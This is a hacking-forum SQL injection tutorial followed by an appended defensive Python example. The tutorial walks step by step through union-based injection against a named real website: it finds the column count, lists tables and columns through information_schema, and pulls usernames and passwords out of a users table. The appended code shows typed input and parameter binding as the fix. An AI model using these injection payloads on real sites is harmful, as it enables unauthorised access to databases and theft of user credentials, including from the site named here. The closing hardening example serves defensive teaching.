
SQL Injection Tutorial By Ralphmigcute From hackforums.net

SQL Injection Tutorial!


Definition: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Vulnerability
The SQL injection will work only if the site is vulnerable to SQL errors.
Ex: http://www. site.org/artist.php?id=74 = Vulnerable
Why? Because if you put in the end of this link it will show up an error:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bmocaorg/public_html/artist.php on line 12.

Check how many Columns!


NOTE U MUST USE -- or /* at the end of the order by
To check how many columns are in the database of http://www.bmoca.org/artist.php?id=74 you must use order by #
Ex:
http://www. site.org/artist.php?id=74 order by 1-- NO ERROR
http://www. site.org/artist.php?id=74 order by 2-- NO ERROR
http://www. site.org/artist.php?id=74 order by 3-- NO ERROR
http://www. site.org/artist.php?id=74 order by 4-- NO ERROR
http://www. site.org/artist.php?id=74 order by 5-- YOU GOT AN ERROR
It means that there are 4 columns in the database.

Union!
NOTE U MUST USE -- or /* at the end of the last number

In order to know which number we will change, we will do a union.
You must put a - in front of the id value:
http://www. site.org/artist.php?id=-74
And you must use union, then the number of columns:
http://www. site.org/artist.php?id=-74 union all select 1,2,3,4--
Example: 2 3 4
Then the number will be in the site. When the number shows up, change one number to version().
If the version is 5 and up, go to the next page.
If the version is 4 and down, skip the next page.

SQL Version 5
http://www.bmoca.org/artist.php?id=-74 union all select 1,version(),3,4--
To check the tables:
http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables--
The list of tables will be in the site. If one table is shown, use limit:
http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables limit 1,1--
Continue incrementing until you find the one u are looking for.
Then if you get the table you want you will need to check for the columns:
Change table_name to column_name
Change information_schema.tables to information_schema.columns
Then remove limit 1,1--
Then add where table_name=
Put the table name that you got in the table list, but u must hex it.

http://home2.paulschou.net/tools/xlate/
This tool is to convert string to hex.
If you choose users then the hex is 7573657273
Before you input the hex u must put 0x in the start, so 0x7573657273
http://www.bmoca.org/artist.php?id=-74 union all select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273--

Then if you choose the column you want, just do this to get the information:
http://www.bmoca.org/artist.php?id=-74 union all select 1,concat_ws(0x3a,username,password),3,4 from users
Change username, password to the columns that you want, then change users to the table you want.
There you go. You got the user's username and password.

Credits to ralphmigcute
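
The root cause named in the definition (request input that is neither strongly typed nor bound as a parameter) next to its fix, as an added example that is not part of the original tutorial. It uses Python's sqlite3 in place of the page's PHP/MySQL so it runs offline; the table, its columns and the function names are constructed for illustration, and the inputs are the id values that appear in the tutorial's URLs.

```python
import re
import sqlite3

COLUMNS = "id, name, bio, city"  # assumed 4-column query, matching the tutorial's count

def make_db():
    # Constructed sample data; stands in for the site's artist table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artist (id INTEGER PRIMARY KEY, name TEXT, bio TEXT, city TEXT)")
    db.execute("INSERT INTO artist VALUES (74, 'Sample Artist', 'Sample bio', 'Sample City')")
    return db

def artist_vulnerable(db, raw_id):
    # Untyped input pasted into the statement: the database parses it as SQL.
    try:
        return db.execute(f"SELECT {COLUMNS} FROM artist WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        # Returning the database error to the client is what makes the flaw visible.
        return f"SQL error: {exc}"

def artist_hardened(db, raw_id):
    # 1) Strong typing: the id must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # caller answers with a generic "not found", no database detail
    # 2) Parameter binding: the value travels separately from the SQL text.
    try:
        return db.execute(f"SELECT {COLUMNS} FROM artist WHERE id = ?", (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return None  # log server-side; never echo the error to the client

if __name__ == "__main__":
    db = make_db()
    # id values taken from the tutorial's URLs
    for raw in ["74", "74 order by 5--", "-74 union all select 1,2,3,4--"]:
        print(repr(raw), "| vulnerable:", artist_vulnerable(db, raw),
              "| hardened:", artist_hardened(db, raw))
```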
